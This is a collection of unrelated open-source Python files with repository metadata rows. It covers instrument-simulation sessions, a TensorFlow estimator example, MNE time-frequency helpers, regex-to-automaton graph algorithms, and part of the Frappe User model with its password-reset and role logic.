assert isinstance(
x509.ExternalCAProfile("MySubCA"),
x509.MSCSTemplateV1)
assert isinstance(
x509.ExternalCAProfile("1.2.3.4:100"),
x509.MSCSTemplateV2)
def test_write_pkispawn_config_file_MSCSTemplateV1(self):
template = x509.MSCSTemplateV1(u"SubCA")
expected = (
'[CA]\n'
'pki_req_ext_oid = 1.3.6.1.4.1.311.20.2\n'
'pki_req_ext_data = 1e0a00530075006200430041\n\n'
)
self._test_write_pkispawn_config_file(template, expected)
def test_write_pkispawn_config_file_MSCSTemplateV2(self):
template = x509.MSCSTemplateV2(u"1.2.3.4:4294967295")
expected = (
'[CA]\n'
'pki_req_ext_oid = 1.3.6.1.4.1.311.21.7\n'
'pki_req_ext_data = 300c06032a0304020500ffffffff\n\n'
)
self._test_write_pkispawn_config_file(template, expected)
def _test_write_pkispawn_config_file(self, template, expected):
"""
Test that the values we read from an ExternalCAProfile
object can be used to produce a reasonable-looking pkispawn
configuration.
"""
config = RawConfigParser()
config.optionxform = str
config.add_section("CA")
config.set("CA", "pki_req_ext_oid", template.ext_oid)
config.set("CA", "pki_req_ext_data",
hexlify(template.get_ext_data()).decode('ascii'))
out = StringIO()
config.write(out)
assert out.getvalue() == expected
| gpl-3.0 | -8,210,279,496,332,169,000 | 41.776623 | 79 | 0.744247 | false |
famish99/pyvisa-sim | pyvisa_sim/tcpip.py | 1 | 2280 | # -*- coding: utf-8 -*-
"""
pyvisa-sim.tcpip
~~~~~~~~~~~~~~~~
TCPIP simulated session class.
:copyright: 2014 by PyVISA-sim Authors, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
import time
from pyvisa import constants
from . import sessions
class BaseTCPIPSession(sessions.Session):
"""Base class for TCPIP sessions."""
def read(self, count):
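        """Read up to count bytes from the simulated device, honoring the
        configured termination character and timeout.
        """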
end_char, _ = self.get_attribute(constants.VI_ATTR_TERMCHAR)
enabled, _ = self.get_attribute(constants.VI_ATTR_TERMCHAR_EN)
timeout, _ = self.get_attribute(constants.VI_ATTR_TMO_VALUE)
timeout /= 1000
start = time.time()
out = b""
while time.time() - start <= timeout:
last = self.device.read()
if not last:
time.sleep(0.01)
continue
out += last
if enabled:
if len(out) > 0 and out[-1] == end_char:
return out, constants.StatusCode.success_termination_character_read
if len(out) == count:
return out, constants.StatusCode.success_max_count_read
else:
return out, constants.StatusCode.error_timeout
def write(self, data):
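        """Write data to the simulated device one byte at a time."""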
        send_end, _ = self.get_attribute(constants.VI_ATTR_SEND_END_EN)
for i in range(len(data)):
self.device.write(data[i : i + 1])
if send_end:
# EOM 4882
pass
return len(data), constants.StatusCode.success
@sessions.Session.register(constants.InterfaceType.tcpip, "INSTR")
class TCPIPInstrumentSession(BaseTCPIPSession):
def after_parsing(self):
self.attrs[constants.VI_ATTR_INTF_NUM] = int(self.parsed.board)
self.attrs[constants.VI_ATTR_TCPIP_ADDR] = self.parsed.host_address
self.attrs[constants.VI_ATTR_TCPIP_DEVICE_NAME] = self.parsed.lan_device_name
@sessions.Session.register(constants.InterfaceType.tcpip, "SOCKET")
class TCPIPSocketSession(BaseTCPIPSession):
def after_parsing(self):
self.attrs[constants.VI_ATTR_INTF_NUM] = int(self.parsed.board)
self.attrs[constants.VI_ATTR_TCPIP_ADDR] = self.parsed.host_address
self.attrs[constants.VI_ATTR_TCPIP_PORT] = int(self.parsed.port)
| mit | -8,203,132,260,625,480,000 | 29.4 | 87 | 0.623684 | false |
waynewolf/abucket | from-tf-web/quickstart/1-get-started-tf-contrib-learn-customize.py | 1 | 1494 | import numpy as np
import tensorflow as tf
# Declare a custom model function; we only have one real-valued feature, "x"
def model(features, labels, mode):
# Build a linear model and predict values
W = tf.get_variable("W", [1], dtype=tf.float64)
b = tf.get_variable("b", [1], dtype=tf.float64)
y = W*features['x'] + b
# Loss sub-graph
loss = tf.reduce_sum(tf.square(y - labels))
# Training sub-graph
global_step = tf.train.get_global_step()
optimizer = tf.train.GradientDescentOptimizer(0.01)
train = tf.group(optimizer.minimize(loss),
tf.assign_add(global_step, 1))
# ModelFnOps connects subgraphs we built to the
# appropriate functionality.
return tf.contrib.learn.ModelFnOps(
mode=mode, predictions=y,
loss=loss,
train_op=train)
estimator = tf.contrib.learn.Estimator(model_fn=model)
# define our data sets
x_train = np.array([1., 2., 3., 4.])
y_train = np.array([0., -1., -2., -3.])
x_eval = np.array([2., 5., 8., 1.])
y_eval = np.array([-1.01, -4.1, -7, 0.])
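# Feed the arrays in batches of 4, repeating the data for 1000 epochs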
input_fn = tf.contrib.learn.io.numpy_input_fn({"x": x_train}, y_train, 4, num_epochs=1000)
eval_input_fn = tf.contrib.learn.io.numpy_input_fn(
{"x":x_eval}, y_eval, batch_size=4, num_epochs=1000)
# train
estimator.fit(input_fn=input_fn, steps=1000)
# Here we evaluate how well our model did.
train_loss = estimator.evaluate(input_fn=input_fn)
eval_loss = estimator.evaluate(input_fn=eval_input_fn)
print("train loss: %r"% train_loss)
print("eval loss: %r"% eval_loss)
| mit | -8,651,862,507,716,371,000 | 37.307692 | 90 | 0.670683 | false |
MadsJensen/agency_connectivity | tf_functions.py | 1 | 5293 | """
Functions for TF analysis.
@author: mje
@email: mads [] cnru.dk
"""
import mne
from mne.time_frequency import (psd_multitaper, tfr_multitaper, tfr_morlet,
cwt_morlet)
from mne.viz import iter_topography
import matplotlib.pyplot as plt
import numpy as np
def calc_psd_epochs(epochs, plot=False):
"""Calculate PSD for epoch.
Parameters
----------
epochs : list of epochs
plot : bool
To show plot of the psds.
It will be average for each condition that is shown.
Returns
-------
psds_vol : numpy array
The psds for the voluntary condition.
psds_invol : numpy array
The psds for the involuntary condition.
"""
tmin, tmax = -0.5, 0.5
fmin, fmax = 2, 90
# n_fft = 2048 # the FFT size (n_fft). Ideally a power of 2
psds_vol, freqs = psd_multitaper(epochs["voluntary"],
tmin=tmin, tmax=tmax,
fmin=fmin, fmax=fmax)
psds_inv, freqs = psd_multitaper(epochs["involuntary"],
tmin=tmin, tmax=tmax,
fmin=fmin, fmax=fmax)
psds_vol = 20 * np.log10(psds_vol) # scale to dB
psds_inv = 20 * np.log10(psds_inv) # scale to dB
if plot:
def my_callback(ax, ch_idx):
"""Executed once you click on one of the channels in the plot."""
ax.plot(freqs, psds_vol_plot[ch_idx], color='red',
label="voluntary")
ax.plot(freqs, psds_inv_plot[ch_idx], color='blue',
label="involuntary")
ax.set_xlabel = 'Frequency (Hz)'
ax.set_ylabel = 'Power (dB)'
ax.legend()
psds_vol_plot = psds_vol.copy().mean(axis=0)
psds_inv_plot = psds_inv.copy().mean(axis=0)
for ax, idx in iter_topography(epochs.info,
fig_facecolor='k',
axis_facecolor='k',
axis_spinecolor='k',
on_pick=my_callback):
ax.plot(psds_vol_plot[idx], color='red', label="voluntary")
ax.plot(psds_inv_plot[idx], color='blue', label="involuntary")
plt.legend()
plt.gcf().suptitle('Power spectral densities')
plt.show()
return psds_vol, psds_inv, freqs
def multitaper_analysis(epochs):
"""
Parameters
----------
epochs : list of epochs
Returns
-------
result : numpy array
The result of the multitaper analysis.
"""
frequencies = np.arange(6., 90., 2.)
n_cycles = frequencies / 2.
time_bandwidth = 4 # Same time-smoothing as (1), 7 tapers.
power, plv = tfr_multitaper(epochs, freqs=frequencies, n_cycles=n_cycles,
time_bandwidth=time_bandwidth, return_itc=True)
return power, plv
def morlet_analysis(epochs, n_cycles=4):
"""
Parameters
----------
epochs : list of epochs
Returns
-------
result : numpy array
        The result of the Morlet wavelet analysis.
"""
frequencies = np.arange(6., 30., 2.)
# n_cycles = frequencies / 2.
power, plv = tfr_morlet(epochs, freqs=frequencies, n_cycles=n_cycles,
return_itc=True,
verbose=True)
return power, plv
def single_trial_tf(epochs, frequencies, n_cycles=4.):
"""
Parameters
----------
epochs : Epochs object
The epochs to calculate TF analysis on.
frequencies : numpy array
n_cycles : int
The number of cycles for the Morlet wavelets.
Returns
-------
results : numpy array
"""
results = []
for j in range(len(epochs)):
tfr = cwt_morlet(epochs.get_data()[j],
sfreq=epochs.info["sfreq"],
freqs=frequencies,
use_fft=True,
n_cycles=n_cycles,
# decim=2,
zero_mean=False)
results.append(tfr)
return results
def calc_spatial_resolution(freqs, n_cycles):
"""Calculate the spatial resolution for a Morlet wavelet.
    The formula is: (freqs / n_cycles) * 2.
Parameters
----------
freqs : numpy array
The frequencies to be calculated.
n_cycles : int or numpy array
The number of cycles used. Can be integer for the same cycle for all
frequencies, or a numpy array for individual cycles per frequency.
Returns
-------
result : numpy array
The results
"""
return (freqs / float(n_cycles)) * 2
def calc_wavelet_duration(freqs, n_cycles):
"""Calculate the wavelet duration for a Morlet wavelet in ms.
The formula is: (cycle / frequencies / pi)*1000
Parameters
----------
freqs : numpy array
The frequencies to be calculated.
n_cycles : int or numpy array
The number of cycles used. Can be integer for the same cycle for all
frequencies, or a numpy array for individual cycles per frequency.
Returns
-------
result : numpy array
The results
"""
return (float(n_cycles) / freqs / np.pi) * 1000
| bsd-3-clause | 6,559,354,453,207,024,000 | 27.005291 | 79 | 0.543737 | false |
termNinja/Conversion-of-Regex-into-Automatons | pyscripts/classes/resources.py | 1 | 18835 | import re, os, sys
from Queue import Queue
# -----------------------------------------------------------------------------
class term_colors:
""" Usage: print term_colors.WARNING + "This is a msg" + term_colors.ENDC """
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# -----------------------------------------------------------------------------
class xlogger:
@staticmethod
def dbg(msg):
""" Prints a debugging msg onto stderr """
print >> sys.stderr, term_colors.FAIL + str(msg) + term_colors.ENDC
@staticmethod
def warn(msg):
""" Prints a warning msg onto stderr """
print >> sys.stderr, term_colors.WARNING + str(msg) + term_colors.ENDC
@staticmethod
def info(msg):
""" Prints an info msg onto stderr """
print >> sys.stderr, term_colors.OKBLUE + str(msg) + term_colors.ENDC
@staticmethod
def fine(msg):
""" Prints an ok msg onto stderr """
print >> sys.stderr, term_colors.OKGREEN + str(msg) + term_colors.ENDC
# -----------------------------------------------------------------------------
# handy macro
class algo_step:
thompson = "_01_thompson"
elimeps = "_02_elimeps"
determ = "_03_determ"
minim = "_04_minim"
# -----------------------------------------------------------------------------
# VERY IMPORTANT:
# -----------------------------------------------------------------------------
# I changed type of end_node into STRING type, if error occurs BEFORE determinisation,
# make sure to check it wasn't caused by this
# -----------------------------------------------------------------------------
class Edge:
def __init__(self, end_node, weight):
"""
Initializes edge object.
end_node -> string
weight -> string
"""
self.end_node = str(end_node)
self.weight = str(weight)
def __str__(self):
return "(" + str(self.end_node) + ", " + str(self.weight) + ")"
def __eq__(self, other):
if self.end_node == other.end_node and self.weight == other.weight:
return True
else:
return False
def __hash__(self):
return hash(self.end_node) ^ hash(self.weight)
# -----------------------------------------------------------------------------
class Node:
def __init__(self, node_val, is_ending):
self.node_val = int(node_val)
self.is_ending = bool(is_ending)
def __str__(self):
if self.is_ending:
return "(" + str(self.node_val) + ")"
else:
return str(self.node_val)
# When reading thomhpson's graph from .gv file, we KNOW that
# node 1 is ENDING state, because that's how Thompson's algorithm was implemented
# for this particular project.
# -----------------------------------------------------------------------------
class Graph:
# -------------------------------------------------------------------------
def __init__(self, graph_map, graph_name):
self.graph_map = {}
self.graph_name = graph_name
self.ending_nodes = [int(1)]
for ending_node in self.ending_nodes:
self.graph_map[ending_node] = []
# -------------------------------------------------------------------------
def __str__(self):
output = str(self.graph_name) + "\n-----------------------------\n"
output += str(self.graph_map)
return output
# -------------------------------------------------------------------------
def form_graph_from_gv(self):
"""
Reads the .gv file that represent the graph
and maps it onto Graph object.
"""
print "reading graph: " + self.graph_name
# algo_step.thompson because python continues where C stopped with work
# => Thompson algorithm has been performed
f = open("../graphs/" + self.graph_name + algo_step.thompson + ".gv", "r")
data = f.read()
f.close()
print "Graph data:"
print data
print
# -----------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------
# Forming graph
regex = r"\"([a-zA-Z0-9]+)\"\s*->\s*\"([a-zA-Z0-9]+)\"\s*"
regex += r"(\[label\s*[=]\s*\"([a-zA-Z0-9]+)\"\])?"
regex = re.compile(regex)
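        # Each regex match is one edge: group(1) = source node,
        # group(2) = target node, group(4) = label (None -> epsilon edge)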
for iter in regex.finditer(data):
node_val = iter.group(1)
into_node = iter.group(2)
            if iter.group(4) is None:
graph_weight = "eps"
else:
graph_weight = iter.group(4)
# Creating node
# NOTICE TODO: Node objects aren't actually needed. It can be removed...later though
if int(node_val) in self.ending_nodes:
node = Node(node_val, True)
print "making " + str(node_val) + "into ending node!"
else:
node = Node(int(node_val), False)
# Creating edge
edge = Edge(into_node, graph_weight)
print node, edge
if node.node_val in self.graph_map.keys():
self.graph_map[node.node_val].append(edge)
else:
self.graph_map[node.node_val] = []
self.graph_map[node.node_val].append(edge)
## TODO remove this, i've put it for testing purposes
self.elim_eps()
self.determinize()
# -------------------------------------------------------------------------
def export_as_gv(self, algstep):
"""
Maps Graph object as gv file.
"""
output_text = []
output_text.append("digraph finite_state_machine {\n")
output_text.append("graph [fontname = \"lmroman12\"];\n")
output_text.append("node [fontname = \"lmroman12\"];\n")
output_text.append("edge [fontname = \"lmroman12\"];\n")
output_text.append("\trankdir=LR;\n")
output_text.append("\tsize=\"8,5\"\n")
output_text.append("\tnode [shape = doublecircle]; ")
for node in self.ending_nodes:
output_text.append("\"")
output_text.append(str(node))
output_text.append("\"")
output_text.append(",")
output_text[-1] = ";\n"
output_text.append("\tnode [shape = circle];\n")
# lets fill in the elements
nodes = self.graph_map.keys()
for node in nodes:
edges = self.graph_map[node]
for edge in edges:
output_text.append("\t\"" + str(node) + "\" -> \"" + str(edge.end_node) + "\"")
# check if it was epsilon
if edge.weight != "eps":
output_text.append(" [label=\"" + str(edge.weight) + "\"]")
output_text.append("\n")
output_text.append("}")
# writing into file
f = open(self.graph_name + str(algstep) + ".gv", "w")
# f = open("tester.gv", "w")
f.write("".join(output_text))
f.close()
# -------------------------------------------------------------------------
# Export graph structure as pdf
# command is:
# dot -Tpdf ../../graphs/source_file.gv -o ../../graphs/output.pdf
def export_as_pdf(self, algstep):
"""
        Draws a vector image of the graph that it reads
        from the .gv file (make sure you have it created).
        Uses dot from graphviz to accomplish this amazing task.
"""
graph_id = self.graph_name.split("_")[0]
output_name = self.graph_name + str(algstep)
os.system("dot -Tpdf " + output_name + ".gv -o " + output_name + ".pdf")
return 1
# -------------------------------------------------------------------------
def elim_eps(self):
"""
Performs algorithm that eliminates epsilon edges in graph.
Wrapper for solve_eps_prob.
"""
new_map = {0: []}
new_ending_nodes = []
visited_nodes = {0: False}
visited = {}
for node in self.graph_map.keys():
visited[node] = {}
for tmp_node in self.graph_map.keys():
visited[node][tmp_node] = False
self.solve_eps_prob(0, 0, new_map, visited, new_ending_nodes)
self.graph_map = new_map
self.ending_nodes = new_ending_nodes
self.export_as_gv(algo_step.elimeps)
self.export_as_pdf(algo_step.elimeps)
xlogger.fine("Exported: " + self.graph_name + algo_step.elimeps + ".gv")
xlogger.fine("Exported: " + self.graph_name + algo_step.elimeps + ".pdf")
# -------------------------------------------------------------------------
def solve_eps_prob(self, root_node, current_node, new_map, visited, ending_nodes):
"""
Recursive method that peforms a DFS search and eliminates epsilon edges.
"""
visited[root_node][current_node] = True
if current_node in self.ending_nodes:
ending_nodes.append(root_node)
return
for adj in self.graph_map[current_node]:
if adj.weight == "eps" and not visited[root_node][int(adj.end_node)]:
self.solve_eps_prob(root_node, int(adj.end_node), new_map, visited, ending_nodes)
elif adj.weight == "eps":
return
else:
if not root_node in new_map.keys():
new_map[root_node] = []
new_map[root_node].append(adj)
if not visited[root_node][int(adj.end_node)]:
self.solve_eps_prob(int(adj.end_node), int(adj.end_node), new_map, visited, ending_nodes)
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def determinize(self):
"""
Performs the determinisation algorithm.
"""
# we switch to string keys because of new states
queue = Queue() # queue.get() queue.put(item)
queue.put("0") # 0 is always the starting node
new_map = {}
new_map["0"] = set()
while queue.qsize() > 0:
print
print "----------------------------------------------------------"
xlogger.info("Queue state: " + str([item for item in queue.queue]))
print "----------------------------------------------------------"
current_node = queue.get()
xlogger.info("Took " + str(current_node) + " from queue.")
# find all adjacent vertices
            # find_adjacent_nodes returns a hash map keyed by edge weight, like:
            # str('a') -> set(int(1), ...), str('b') -> set(int(5), int(6), int(7))
xlogger.info("Calling find_adjacent_nodes with " + str(current_node))
adjacent_nodes = self.find_adjacent_nodes(current_node)
xlogger.info("Adjacent nodes: " + str(adjacent_nodes))
# update a map row if required for new deterministic nodes
self.update_new_map_row(current_node, adjacent_nodes, new_map, queue)
xlogger.fine("Determinized graph:")
for key in new_map.keys():
print str(key) + "->"
for elem in new_map[key]:
print "---->" + str(elem)
self.convert_into_object_map(new_map)
self.export_as_gv(algo_step.determ)
self.export_as_pdf(algo_step.determ)
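    # Sketch of the intermediate structure (assuming an NFA with edges 0-a->1 and 0-a->2):
    # new_map would map "0" -> set([("a", "1,2")]), and "1,2" becomes a new composite
    # state that is pushed onto the queue and expanded in a later iteration.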
# ----------------------------------------------------------------------
# Used by method: determinize
# ----------------------------------------------------------------------
def update_new_map_row(self, current_node, adjacent_nodes, new_map, queue):
"""
        Helper for the determinisation algorithm: records the outgoing edges of
        current_node in new_map and enqueues any newly formed composite node.
"""
# For each weight in array
for weight in adjacent_nodes.keys():
# --------------------------------------------------------------
# We iterate over set of ints and form a string
# --------------------------------------------------------------
new_node = []
new_edges = []
for elem in adjacent_nodes[weight]:
# forming a string
new_node.append(str(elem))
new_node.append(",")
new_node = "".join(new_node)[0:-1] # cut , at the end
xlogger.info("formed string: " + new_node)
# --------------------------------------------------------------
elem = self.list_to_string(adjacent_nodes[weight])
xlogger.info("result from [a] -> str: " + str(elem))
xlogger.info("type(" + str(elem) + " is " + str(type(elem)))
# new_map[current_node] = elem
if not current_node in new_map:
new_map[current_node] = set()
new_map[current_node].add((weight, elem))
## now we check if new_node is in new_map.keys(),
## if so, we ignore it, if not, we add it into queue and update
            ## its adjacent nodes
print type(new_node)
if not new_node in new_map.keys():
## adding into queue
xlogger.info("adding into queue: " + str(new_node))
queue.put(new_node)
## updating
# new_map[new_node] = []
# ----------------------------------------------------------------------
def list_to_string(self, nodelist):
"""
        Converts a list of elements into a string with ',' as separator.
[1, 2, 3] => "1,2,3"
"""
print
res = []
for elem in nodelist:
res.append(str(elem))
res.append(",")
res = "".join(res)[0:-1] # cut , at the end
xlogger.dbg("Done conversion: " + str(res))
print
return res
# ----------------------------------------------------------------------
def string_to_list(self, nodestr):
"""
        Converts a comma-separated string into a sorted list of strings.
        Node labels are assumed to be numeric (they are cast to int for sorting).
        "3,1,2" => ["1", "2", "3"]
"""
if nodestr[-1] == ",":
nodestr = nodestr.split(",")[0:-1]
else:
nodestr = nodestr.split(",")
tmp = []
xlogger.dbg("string_to_list: ")
xlogger.dbg("nodestr: " + str(nodestr))
for elem in nodestr:
tmp.append(int(elem))
tmp.sort()
nodestr = []
for elem in tmp:
nodestr.append(str(elem))
xlogger.dbg("nodestr: " + str(nodestr))
return nodestr
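    # Example (numeric labels assumed): string_to_list("3,1,2") -> ['1', '2', '3']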
# ----------------------------------------------------------------------
# Used by method: determinize
# ----------------------------------------------------------------------
def find_adjacent_nodes(self, current_node):
"""
        Used as a helper function in the determinisation algorithm.
It finds adjacent nodes for a given node.
"""
xlogger.info("Entered find_adjacent_nodes with current_node = " + str(current_node))
# current node can be something like: "0,3,5"
        adjacent_nodes = {}  # example: 'a' -> set([1, 2, 3]), 'b' -> set([3, 4, 5])
        # "0,3,5" -> ['0', '3', '5']
xlogger.dbg("calling conversion for: " + str(current_node))
current_node = self.string_to_list(current_node)
xlogger.info("updated current_node, current_node = " + str(current_node))
        # ['0', '3', '5'] -> '0', '3', '5'
xlogger.dbg("current node: " + str(current_node))
for node in current_node:
xlogger.dbg("node: " + str(node))
if int(node) in self.graph_map.keys():
for edge in self.graph_map[int(node)]:
if edge.weight not in adjacent_nodes:
adjacent_nodes[edge.weight] = set()
adjacent_nodes[edge.weight].add(int(edge.end_node))
return adjacent_nodes
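    # Example (assuming edges 0-a->1, 0-a->2 and 3-b->4 in graph_map):
    # find_adjacent_nodes("0,3") -> {'a': set([1, 2]), 'b': set([4])}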
# ----------------------------------------------------------------------
def convert_into_object_map(self, new_map):
"""
        Converts the temporary hash map created during the determinisation
        algorithm into the main graph map used for storing the graph.
It also sets ending nodes.
"""
ending_nodes = []
self.graph_map.clear()
graph_nodes = new_map.keys()
for node in graph_nodes:
self.graph_map[node] = []
for edge in new_map[node]:
# ('1,2,3', 'a')
self.graph_map[node].append(Edge(edge[1], edge[0]))
if not edge[1] in graph_nodes:
self.graph_map[edge[1]] = []
# finding ending nodes
# node => "11,3" for example
for node in self.graph_map.keys():
nodez = self.string_to_list(node)
for elem in nodez:
xlogger.dbg("elem: " + str(elem))
if int(elem) in self.ending_nodes:
ending_nodes.append(str(node))
break
xlogger.info("old ending nodes: " + str(self.ending_nodes))
xlogger.info("new ending nodes: " + str(ending_nodes))
# adding nodes that don't have an output edge
# currently, they are implicitly given in our graph structure
# they appear only in edges in map (example: 3 has no output edge)
# For example, "1,2" -> ("ab", "3")
# Lets find nodes like this and add them into main map
for node in graph_nodes:
for edge in new_map[node]:
if not edge[1] in graph_nodes:
self.graph_map[edge[1]] = []
# Finally, we form the ending nodes in Graph object
self.ending_nodes = ending_nodes
print
self.show_graph()
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
def show_graph(self):
"""
Prints graph to stdout.
"""
for node in self.graph_map.keys():
print node
for edge in self.graph_map[node]:
print " -> " + str(edge)
# ----------------------------------------------------------------------
    # TODO: Next to implement
# ----------------------------------------------------------------------
    def minimize(self):
"""
Performs minimization algorithm.
"""
return 1
# -----------------------------------------------------------------------------
| gpl-3.0 | -8,287,676,522,294,573,000 | 38.239583 | 109 | 0.45219 | false |
saurabh6790/frappe | frappe/core/doctype/user/user.py | 1 | 39931 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, print_function
from bs4 import BeautifulSoup
import frappe
import frappe.share
import frappe.defaults
import frappe.permissions
from frappe.model.document import Document
from frappe.utils import (cint, flt, has_gravatar, escape_html, format_datetime,
now_datetime, get_formatted_email, today)
from frappe import throw, msgprint, _
from frappe.utils.password import update_password as _update_password, check_password, get_password_reset_limit
from frappe.desk.notifications import clear_notifications
from frappe.desk.doctype.notification_settings.notification_settings import create_notification_settings, toggle_notifications
from frappe.utils.user import get_system_managers
from frappe.website.utils import is_signup_enabled
from frappe.rate_limiter import rate_limit
from frappe.utils.background_jobs import enqueue
from frappe.core.doctype.user_type.user_type import user_linked_with_permission_on_doctype
STANDARD_USERS = ("Guest", "Administrator")
class MaxUsersReachedError(frappe.ValidationError):
pass
class User(Document):
__new_password = None
def __setup__(self):
# because it is handled separately
self.flags.ignore_save_passwords = ['new_password']
def autoname(self):
"""set name as Email Address"""
if self.get("is_admin") or self.get("is_guest"):
self.name = self.first_name
else:
self.email = self.email.strip().lower()
self.name = self.email
def onload(self):
from frappe.config import get_modules_from_all_apps
self.set_onload('all_modules',
[m.get("module_name") for m in get_modules_from_all_apps()])
def before_insert(self):
self.flags.in_insert = True
throttle_user_creation()
def after_insert(self):
create_notification_settings(self.name)
frappe.cache().delete_key('users_for_mentions')
def validate(self):
self.check_demo()
# clear new password
self.__new_password = self.new_password
self.new_password = ""
if not frappe.flags.in_test:
self.password_strength_test()
if self.name not in STANDARD_USERS:
self.validate_email_type(self.email)
self.validate_email_type(self.name)
self.add_system_manager_role()
self.set_system_user()
self.set_full_name()
self.check_enable_disable()
self.ensure_unique_roles()
self.remove_all_roles_for_guest()
self.validate_username()
self.remove_disabled_roles()
self.validate_user_email_inbox()
ask_pass_update()
self.validate_roles()
self.validate_allowed_modules()
self.validate_user_image()
if self.language == "Loading...":
self.language = None
if (self.name not in ["Administrator", "Guest"]) and (not self.get_social_login_userid("frappe")):
self.set_social_login_userid("frappe", frappe.generate_hash(length=39))
def validate_roles(self):
if self.role_profile_name:
role_profile = frappe.get_doc('Role Profile', self.role_profile_name)
self.set('roles', [])
self.append_roles(*[role.role for role in role_profile.roles])
def validate_allowed_modules(self):
if self.module_profile:
module_profile = frappe.get_doc('Module Profile', self.module_profile)
self.set('block_modules', [])
for d in module_profile.get('block_modules'):
self.append('block_modules', {
'module': d.module
})
def validate_user_image(self):
if self.user_image and len(self.user_image) > 2000:
frappe.throw(_("Not a valid User Image."))
def on_update(self):
# clear new password
self.share_with_self()
clear_notifications(user=self.name)
frappe.clear_cache(user=self.name)
now=frappe.flags.in_test or frappe.flags.in_install
self.send_password_notification(self.__new_password)
frappe.enqueue(
'frappe.core.doctype.user.user.create_contact',
user=self,
ignore_mandatory=True,
now=now
)
if self.name not in ('Administrator', 'Guest') and not self.user_image:
frappe.enqueue('frappe.core.doctype.user.user.update_gravatar', name=self.name, now=now)
# Set user selected timezone
if self.time_zone:
frappe.defaults.set_default("time_zone", self.time_zone, self.name)
if self.has_value_changed('allow_in_mentions') or self.has_value_changed('user_type'):
frappe.cache().delete_key('users_for_mentions')
def has_website_permission(self, ptype, user, verbose=False):
"""Returns true if current user is the session user"""
return self.name == frappe.session.user
def check_demo(self):
if frappe.session.user == '[email protected]':
frappe.throw(_('Cannot change user details in demo. Please signup for a new account at https://erpnext.com'), title=_('Not Allowed'))
def set_full_name(self):
self.full_name = " ".join(filter(None, [self.first_name, self.last_name]))
def check_enable_disable(self):
# do not allow disabling administrator/guest
if not cint(self.enabled) and self.name in STANDARD_USERS:
frappe.throw(_("User {0} cannot be disabled").format(self.name))
if not cint(self.enabled):
self.a_system_manager_should_exist()
# clear sessions if disabled
if not cint(self.enabled) and getattr(frappe.local, "login_manager", None):
frappe.local.login_manager.logout(user=self.name)
# toggle notifications based on the user's status
toggle_notifications(self.name, enable=cint(self.enabled))
def add_system_manager_role(self):
# if adding system manager, do nothing
if not cint(self.enabled) or ("System Manager" in [user_role.role for user_role in
self.get("roles")]):
return
if (self.name not in STANDARD_USERS and self.user_type == "System User" and not self.get_other_system_managers()
and cint(frappe.db.get_single_value('System Settings', 'setup_complete'))):
			msgprint(_("Adding System Manager to this User as there must be at least one System Manager"))
self.append("roles", {
"doctype": "Has Role",
"role": "System Manager"
})
if self.name == 'Administrator':
# Administrator should always have System Manager Role
self.extend("roles", [
{
"doctype": "Has Role",
"role": "System Manager"
},
{
"doctype": "Has Role",
"role": "Administrator"
}
])
def email_new_password(self, new_password=None):
if new_password and not self.flags.in_insert:
_update_password(user=self.name, pwd=new_password, logout_all_sessions=self.logout_all_sessions)
def set_system_user(self):
'''For the standard users like admin and guest, the user type is fixed.'''
user_type_mapper = {
'Administrator': 'System User',
'Guest': 'Website User'
}
if self.user_type and not frappe.get_cached_value('User Type', self.user_type, 'is_standard'):
if user_type_mapper.get(self.name):
self.user_type = user_type_mapper.get(self.name)
else:
self.set_roles_and_modules_based_on_user_type()
else:
'''Set as System User if any of the given roles has desk_access'''
self.user_type = 'System User' if self.has_desk_access() else 'Website User'
def set_roles_and_modules_based_on_user_type(self):
user_type_doc = frappe.get_cached_doc('User Type', self.user_type)
if user_type_doc.role:
self.roles = []
# Check whether User has linked with the 'Apply User Permission On' doctype or not
if user_linked_with_permission_on_doctype(user_type_doc, self.name):
self.append('roles', {
'role': user_type_doc.role
})
frappe.msgprint(_('Role has been set as per the user type {0}')
.format(self.user_type), alert=True)
user_type_doc.update_modules_in_user(self)
def has_desk_access(self):
'''Return true if any of the set roles has desk access'''
if not self.roles:
return False
return len(frappe.db.sql("""select name
from `tabRole` where desk_access=1
and name in ({0}) limit 1""".format(', '.join(['%s'] * len(self.roles))),
[d.role for d in self.roles]))
def share_with_self(self):
frappe.share.add(self.doctype, self.name, self.name, write=1, share=1,
flags={"ignore_share_permission": True})
def validate_share(self, docshare):
pass
# if docshare.user == self.name:
# if self.user_type=="System User":
# if docshare.share != 1:
# frappe.throw(_("Sorry! User should have complete access to their own record."))
# else:
# frappe.throw(_("Sorry! Sharing with Website User is prohibited."))
def send_password_notification(self, new_password):
try:
if self.flags.in_insert:
if self.name not in STANDARD_USERS:
if new_password:
# new password given, no email required
_update_password(user=self.name, pwd=new_password,
logout_all_sessions=self.logout_all_sessions)
if not self.flags.no_welcome_mail and cint(self.send_welcome_email):
self.send_welcome_mail_to_user()
self.flags.email_sent = 1
if frappe.session.user != 'Guest':
msgprint(_("Welcome email sent"))
return
else:
self.email_new_password(new_password)
except frappe.OutgoingEmailError:
print(frappe.get_traceback())
pass # email server not set, don't send email
@Document.hook
def validate_reset_password(self):
pass
def reset_password(self, send_email=False, password_expired=False):
from frappe.utils import random_string, get_url
key = random_string(32)
self.db_set("reset_password_key", key)
url = "/update-password?key=" + key
if password_expired:
url = "/update-password?key=" + key + '&password_expired=true'
link = get_url(url)
if send_email:
self.password_reset_mail(link)
return link
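	# The generated link has the form <site>/update-password?key=<32-char key>,
	# with &password_expired=true appended when the reset is forced.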
def get_other_system_managers(self):
return frappe.db.sql("""select distinct `user`.`name` from `tabHas Role` as `user_role`, `tabUser` as `user`
where user_role.role='System Manager'
and `user`.docstatus<2
and `user`.enabled=1
and `user_role`.parent = `user`.name
and `user_role`.parent not in ('Administrator', %s) limit 1""", (self.name,))
def get_fullname(self):
"""get first_name space last_name"""
return (self.first_name or '') + \
(self.first_name and " " or '') + (self.last_name or '')
def password_reset_mail(self, link):
self.send_login_mail(_("Password Reset"),
"password_reset", {"link": link}, now=True)
def send_welcome_mail_to_user(self):
from frappe.utils import get_url
link = self.reset_password()
subject = None
method = frappe.get_hooks("welcome_email")
if method:
